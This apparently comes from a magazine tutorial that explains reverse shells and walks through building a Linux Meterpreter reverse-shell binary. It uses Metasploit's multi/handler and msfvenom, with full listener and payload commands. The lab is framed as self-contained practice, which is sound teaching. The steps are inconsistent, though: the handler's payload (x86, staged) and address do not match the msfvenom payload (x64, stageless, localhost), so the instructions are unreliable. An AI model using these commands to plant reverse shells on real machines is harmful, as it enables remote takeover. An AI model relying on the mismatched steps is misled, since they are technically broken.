Malicious hackers might use all kinds of techniques to foist their malware on to unsuspecting targets. Getting a payload (something that an attacker wants to execute on a target machine) into a well-protected target network might not be as simple as adding a dodgy attachment to an email. Don’t get us wrong, this (and sending malicious links) still works a lot of the time. But if a target is too canny (with the filters, firewalls and what have you) for these techniques, then some additional know-how is required. This might involve exploiting some vulnerability that an attacker has inside knowledge of, or it might involve paying an initial-access broker for login credentials.
Once inside a network, our intrepid attacker needs some means of executing the payload. That payload might be anything from an information stealer or something that tries to delete everything (a wiper) to ransomware or something to gain more persistent access. Whatever the final goal, the excitement often begins with a reverse shell. This is something that inadvertently gets executed on a target that causes it to call out to an attacker-controlled machine. That machine is listening for the call, so it circumvents basic firewall protections (since they might only block incoming connections). Once it picks up, the attacker gets shell access and can execute commands on the remote machine. It might be a Bash shell, a Powershell shell, or maybe a bespoke shell coded in any language supported on the machine (for stealth).
BUILDING A CUSTOM EXPLOIT
Who says Linux doesn’t get malware? We’re going to go ahead and build some. Except don’t worry, it won’t cause any unintended harm. Rather it’ll show you how a reverse shell works and give you hands-on payload engineering. We’ll first use Metasploit’s multi-handler to get our BackBox machine listening for Meterpreter connections: msf6> use multi/handler
The prompt will change. The multi-handler is used to manage connections from any payloads. Type show payloads to see them all. Now select the Meterpreter shell with: > set payload linux/x86/meterpreter/reverse_tcp
Now we need to bake in our IP address (use localhost if you don’t feel like trying this over your LAN) and a port our ‘malware’ can use to connect to us. Let’s say: set LHOST 192.168.0.100 set LPORT 4444 exploit
There, our machine is now listening for Meterpreter connections. Now we use MSFVenom to forge the TCP witchcraft that we’ll run on the target machine. Open a new terminal and run: $ msfvenom -p linux/x64/meterpreter_reverse_tcp --format elf LHOST=localhost LPORT=4444 > malware.run
Put the malware.run file on your target machine (no, we won’t tell you how to do this if you didn’t have access to that machine). Then run it with ./malware.run and go back to Metasploit on our BackBox machine. You should see a message saying that a Meterpreter session has been opened, and you are now free to pwn yourself.
BUILDING A CUSTOM EXPLOIT